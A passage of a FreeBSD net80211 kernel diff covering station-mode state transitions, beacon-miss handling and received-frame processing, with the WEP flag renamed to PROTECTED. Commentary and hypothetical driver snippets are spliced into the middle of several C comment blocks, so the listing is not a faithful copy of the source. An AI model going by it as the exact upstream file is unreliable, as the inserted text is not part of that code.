"%s: override %s -> %s (DFS)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); } break; case IEEE80211_S_INIT: /* cancel any scan in progress */ ieee80211_cancel_scan(vap); if (ostate == IEEE80211_S_INIT ) { /* XXX don't believe this */ /* INIT -> INIT. nothing to do */ vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANWAIT; } /* fall thru... 
*/ default: break; } /* defer the state change to a thread */ vap->iv_nstate = nstate; vap->iv_nstate_arg = arg; vap->iv_flags_ext |= IEEE80211_FEXT_STATEWAIT; ieee80211_runtask(ic, &vap->iv_nstate_task); return EINPROGRESS; } int ieee80211_new_state(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; int rc; IEEE80211_LOCK(ic); rc = ieee80211_new_state_locked(vap, nstate, arg); IEEE80211_UNLOCK(ic); return rc; } diff --git a/sys/net80211/ieee80211_sta.c b/sys/net80211/ieee80211_sta.c index 84d25df611c9..8685e4b0460f 100644 --- a/sys/net80211/ieee80211_sta.c +++ b/sys/net80211/ieee80211_sta.c @@ -1,1804 +1,1804 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 Station mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void sta_vattach(struct ieee80211vap *); static void sta_beacon_miss(struct ieee80211vap *); static int sta_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int sta_input(struct ieee80211_node *, struct mbuf *, int, int); static void sta_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int rssi, int nf); static void sta_recv_ctl(struct ieee80211_node *, struct mbuf *, int subtype); void ieee80211_sta_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_STA] = sta_vattach; } void ieee80211_sta_detach(struct ieee80211com *ic) { } static void sta_vdetach(struct ieee80211vap *vap) { } static void sta_vattach(struct ieee80211vap *vap) { vap->iv_newstate = sta_newstate; vap->iv_input = sta_input; vap->iv_recv_mgmt = sta_recv_mgmt; vap->iv_recv_ctl = sta_recv_ctl; vap->iv_opdetach = sta_vdetach; vap->iv_bmiss = sta_beacon_miss; } /* * Handle a beacon miss event. The common code filters out * spurious events that can happen when scanning and/or before * reaching RUN state. 
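Because the work above is handed off to the vap state task, the return values of ieee80211_new_state()/ieee80211_new_state_locked() read as follows from the code: EINPROGRESS means the request was queued, 0 means it was parked (e.g. waiting for another vap's scan), and -1 means it was refused because the vap is being stopped. A hypothetical caller-side sketch, not taken from the patch:

/*
 * Hypothetical caller: EINPROGRESS is the normal "accepted" return
 * since the transition is completed later by the state task.
 */
static void
example_request_scan(struct ieee80211vap *vap)
{
    int error;

    error = ieee80211_new_state(vap, IEEE80211_S_SCAN, 0);
    if (error != 0 && error != EINPROGRESS)
        if_printf(vap->iv_ifp, "state change not queued: %d\n", error);
}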
*/ static void sta_beacon_miss(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK_ASSERT(ic); KASSERT((ic->ic_flags & IEEE80211_F_SCAN) == 0, ("scanning")); KASSERT(vap->iv_state >= IEEE80211_S_RUN, ("wrong state %s", ieee80211_state_name[vap->iv_state])); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "beacon miss, mode %s state %s\n", ieee80211_opmode_name[vap->iv_opmode], ieee80211_state_name[vap->iv_state]); if (vap->iv_state == IEEE80211_S_CSA) { /* * A Channel Switch is pending; assume we missed the * beacon that would've completed the process and just * force the switch. If we made a mistake we'll not * find the AP on the new channel and fall back to a * normal scan. */ ieee80211_csa_completeswitch(ic); return; } if (++vap->iv_bmiss_count < vap->iv_bmiss_max) { /* * Send a directed probe req before falling back to a * scan; if we receive a response iv_bmiss_count will * be reset. Some cards mistakenly report beacon miss * so this avoids the expensive scan if the ap is * still there. */ ieee80211_send_probereq(vap->iv_bss, vap->iv_myaddr, vap->iv_bss->ni_bssid, vap->iv_bss->ni_bssid, vap->iv_bss->ni_essid, vap->iv_bss->ni_esslen); return; } callout_stop(&vap->iv_swbmiss); vap->iv_bmiss_count = 0; vap->iv_stats.is_beacon_miss++; if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { #ifdef IEEE80211_SUPPORT_SUPERG struct ieee80211com *ic = vap->iv_ic; /* * If we receive a beacon miss interrupt when using * dynamic turbo, attempt to switch modes before * reassociating. */ if (IEEE80211_ATH_CAP(vap, vap->iv_bss, IEEE80211_NODE_TURBOP)) ieee80211_dturbo_switch(vap, ic->ic_bsschan->ic_flags ^ IEEE80211_CHAN_TURBO); #endif /* * Try to reassociate before scanning for a new ap. */ ieee80211_new_state(vap, IEEE80211_S_ASSOC, 1); } else { /* * Somebody else is controlling state changes (e.g. * a user-mode app); don't do anything that would * confuse them; just drop into scan mode so they'll be * notified of the state change and given control. */ ieee80211_new_state(vap, IEEE80211_S_SCAN, 0); } } /* * Handle deauth with reason. We retry only for * the cases where we might succeed. Otherwise * we downgrade the ap and scan. */ static void sta_authretry(struct ieee80211vap *vap, struct ieee80211_node *ni, int reason) { switch (reason) { case IEEE80211_STATUS_SUCCESS: /* NB: MLME assoc */ case IEEE80211_STATUS_TIMEOUT: case IEEE80211_REASON_ASSOC_EXPIRE: case IEEE80211_REASON_NOT_AUTHED: case IEEE80211_REASON_NOT_ASSOCED: case IEEE80211_REASON_ASSOC_LEAVE: case IEEE80211_REASON_ASSOC_NOT_AUTHED: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); break; default: ieee80211_scan_assoc_fail(vap, vap->iv_bss->ni_macaddr, reason); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; } } /* * IEEE80211_M_STA vap state machine handler. * This routine handles the main states in the 802.11 protocol.
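For context, sta_beacon_miss() above is reached through the vap's iv_bmiss method; drivers normally report the missed-beacon condition via ieee80211_beacon_miss(), which fans the event out to each vap. A minimal hypothetical driver hook (the mydrv_bmiss_task name and the task wiring are assumptions, not part of this patch):

/*
 * Hypothetical driver glue: forward a hardware beacon-miss indication
 * to net80211, which invokes the per-vap iv_bmiss handlers.
 */
static void
mydrv_bmiss_task(void *arg, int npending)
{
    struct ieee80211com *ic = arg;

    if ((ic->ic_flags & IEEE80211_F_SCAN) == 0)
        ieee80211_beacon_miss(ic);      /* dispatches to sta_beacon_miss */
}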
*/ static int sta_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ callout_stop(&vap->iv_mgtsend); /* XXX callout_drain */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ if (vap->iv_flags_ext & IEEE80211_FEXT_SWBMISS) callout_stop(&vap->iv_swbmiss); switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SLEEP: /* XXX wakeup */ case IEEE80211_S_RUN: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_ASSOC_LEAVE); ieee80211_sta_leave(ni); break; case IEEE80211_S_ASSOC: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_AUTH_LEAVE); break; case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: goto invalid; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: /* * These can happen either because of a timeout * on an assoc/auth response or because of a * change in state that requires a reset. For * the former we're called with a non-zero arg * that is the cause for the failure; pass this * to the scan code so it can update state. * Otherwise trigger a new scan unless we're in * manual roaming mode in which case an application * must issue an explicit scan request. */ if (arg != 0) ieee80211_scan_assoc_fail(vap, vap->iv_bss->ni_macaddr, arg); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; case IEEE80211_S_RUN: /* beacon miss */ /* * Beacon miss. Notify user space and if not * under control of a user application (roaming * manual) kick off a scan to re-connect. */ ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; default: goto invalid; } break; case IEEE80211_S_AUTH: switch (ostate) { case IEEE80211_S_INIT: case IEEE80211_S_SCAN: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); break; case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: switch (arg & 0xff) { case IEEE80211_FC0_SUBTYPE_AUTH: /* ??? 
*/ IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 2); break; case IEEE80211_FC0_SUBTYPE_DEAUTH: sta_authretry(vap, ni, arg>>8); break; } break; case IEEE80211_S_RUN: switch (arg & 0xff) { case IEEE80211_FC0_SUBTYPE_AUTH: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 2); vap->iv_state = ostate; /* stay RUN */ break; case IEEE80211_FC0_SUBTYPE_DEAUTH: ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { /* try to reauth */ IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); } break; } break; default: goto invalid; } break; case IEEE80211_S_ASSOC: switch (ostate) { case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_ASSOC_REQ, 0); break; case IEEE80211_S_SLEEP: /* cannot happen */ case IEEE80211_S_RUN: ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { IEEE80211_SEND_MGMT(ni, arg ? IEEE80211_FC0_SUBTYPE_REASSOC_REQ : IEEE80211_FC0_SUBTYPE_ASSOC_REQ, 0); } break; default: goto invalid; } break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_RUN: case IEEE80211_S_CSA: break; case IEEE80211_S_AUTH: /* when join is done in fw */ case IEEE80211_S_ASSOC: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { ieee80211_note(vap, "%s with %s ssid ", (vap->iv_opmode == IEEE80211_M_STA ? "associated" : "synchronized"), ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(vap->iv_bss->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif ieee80211_scan_assoc_success(vap, ni->ni_macaddr); ieee80211_notify_node_join(ni, arg == IEEE80211_FC0_SUBTYPE_ASSOC_RESP); break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 0); break; default: goto invalid; } ieee80211_sync_curchan(ic); if (ostate != IEEE80211_S_RUN && (vap->iv_flags_ext & IEEE80211_FEXT_SWBMISS)) { /* * Start s/w beacon miss timer for devices w/o * hardware support. We fudge a bit here since * we're doing this in software. */ vap->iv_swbmiss_period = IEEE80211_TU_TO_TICKS( 2 * vap->iv_bmissthreshold * ni->ni_intval); vap->iv_swbmiss_count = 0; callout_reset(&vap->iv_swbmiss, vap->iv_swbmiss_period, ieee80211_swbmiss, vap); } /* * When 802.1x is not in use mark the port authorized * at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); /* * Fake association when joining an existing bss. */ if (ic->ic_newassoc != NULL) ic->ic_newassoc(vap->iv_bss, ostate != IEEE80211_S_RUN); break; case IEEE80211_S_CSA: if (ostate != IEEE80211_S_RUN) goto invalid; break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 1); break; default: invalid: IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: unexpected state transition %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); break; } return 0; } /* * Return non-zero if the frame is an echo of a multicast * frame sent by ourself. The dir is known to be DSTODS. */ static __inline int isdstods_mcastecho(struct ieee80211vap *vap, const struct ieee80211_frame *wh) { #define QWH4(wh) ((const struct ieee80211_qosframe_addr4 *)wh) #define WH4(wh) ((const struct ieee80211_frame_addr4 *)wh) const uint8_t *sa; KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode")); if (!IEEE80211_IS_MULTICAST(wh->i_addr3)) return 0; sa = IEEE80211_QOS_HAS_SEQ(wh) ? 
QWH4(wh)->i_addr4 : WH4(wh)->i_addr4; return IEEE80211_ADDR_EQ(sa, vap->iv_myaddr); #undef WH4 #undef QWH4 } /* * Return non-zero if the frame is an echo of a multicast * frame sent by ourself. The dir is known to be FROMDS. */ static __inline int isfromds_mcastecho(struct ieee80211vap *vap, const struct ieee80211_frame *wh) { KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode")); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) return 0; return IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_myaddr); } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 0; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int sta_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. 
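The header comment above describes the contract for sta_input(): the driver supplies the sender's node reference plus RSSI/noise floor. As a hedged sketch (not from this patch; mydrv_rx_frame is an invented name), the usual driver receive path that ends up here looks like:

/*
 * Hypothetical receive hand-off: look up the sender, then let net80211
 * dispatch through iv_input (sta_input() below for STA vaps).
 */
static void
mydrv_rx_frame(struct ieee80211com *ic, struct mbuf *m, int rssi, int nf)
{
    struct ieee80211_node *ni;

    ni = ieee80211_find_rxnode(ic,
        mtod(m, const struct ieee80211_frame_min *));
    if (ni != NULL) {
        (void) ieee80211_input(ni, m, rssi, nf);
        ieee80211_free_node(ni);
    } else
        (void) ieee80211_input_all(ic, m, rssi, nf);
}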
*/ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { bssid = wh->i_addr2; if (!IEEE80211_ADDR_EQ(bssid, ni->ni_bssid)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } /* * Some devices may be in a promiscuous mode * where they receive frames for multiple station * addresses. * * If we receive a data frame that isn't * destined to our VAP MAC, drop it. * * XXX TODO: This is only enforced when not scanning; * XXX it assumes a software-driven scan will put the NIC * XXX into a "no data frames" mode before setting this * XXX flag. Otherwise it may be possible that we'll still * XXX process data frames whilst scanning. */ if ((! IEEE80211_IS_MULTICAST(wh->i_addr1)) && (! IEEE80211_ADDR_EQ(wh->i_addr1, IF_LLADDR(ifp)))) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "not to cur sta: lladdr=%6D, addr1=%6D", IF_LLADDR(ifp), ":", wh->i_addr1, ":"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && (dir == IEEE80211_FC1_DIR_FROMDS || dir == IEEE80211_FC1_DIR_DSTODS) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: if (dir == IEEE80211_FC1_DIR_FROMDS) { if ((ifp->if_flags & IFF_SIMPLEX) && isfromds_mcastecho(vap, wh)) { /* * In IEEE802.11 network, multicast * packets sent from "me" are broadcast * from the AP; silently discard for * SIMPLEX interface. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "multicast echo"); vap->iv_stats.is_rx_mcastecho++; goto out; } if ((vap->iv_flags & IEEE80211_F_DWDS) && IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* * DWDS sta's must drop 3-address mcast frames * as they will be sent separately as a 4-addr * frame. Accepting the 3-addr frame will * confuse the bridge into thinking the sending * sta is located at the end of WDS link. 
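As a reference for the duplicate check earlier in sta_input(): the host-order sequence control word packs the fragment number in the low bits and the sequence number above it, which is exactly how the discard message above decodes it. Illustrative helpers only (not part of the patch), using the same masks from ieee80211.h:

/* Illustrative only: split a host-order sequence control word. */
static __inline uint16_t
seqctl_seqno(uint16_t seqctl)
{
    return (seqctl & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT;
}

static __inline uint16_t
seqctl_fragno(uint16_t seqctl)
{
    return (seqctl & IEEE80211_SEQ_FRAG_MASK);
}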
*/ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "3-address data", "%s", "DWDS enabled"); vap->iv_stats.is_rx_mcastecho++; goto out; } } else if (dir == IEEE80211_FC1_DIR_DSTODS) { if ((vap->iv_flags & IEEE80211_F_DWDS) == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "4-address data", "%s", "DWDS not enabled"); vap->iv_stats.is_rx_wrongdir++; goto out; } if ((ifp->if_flags & IFF_SIMPLEX) && isdstods_mcastecho(vap, wh)) { /* * In IEEE802.11 network, multicast * packets sent from "me" are broadcast * from the AP; silently discard for * SIMPLEX interface. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "4-address data", "%s", "multicast echo"); vap->iv_stats.is_rx_mcastecho++; goto out; } } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. 
*/ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (subtype != IEEE80211_FC0_SUBTYPE_AUTH) { /* * Only shared key auth frames with a challenge * should be encrypted, discard all others. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. 
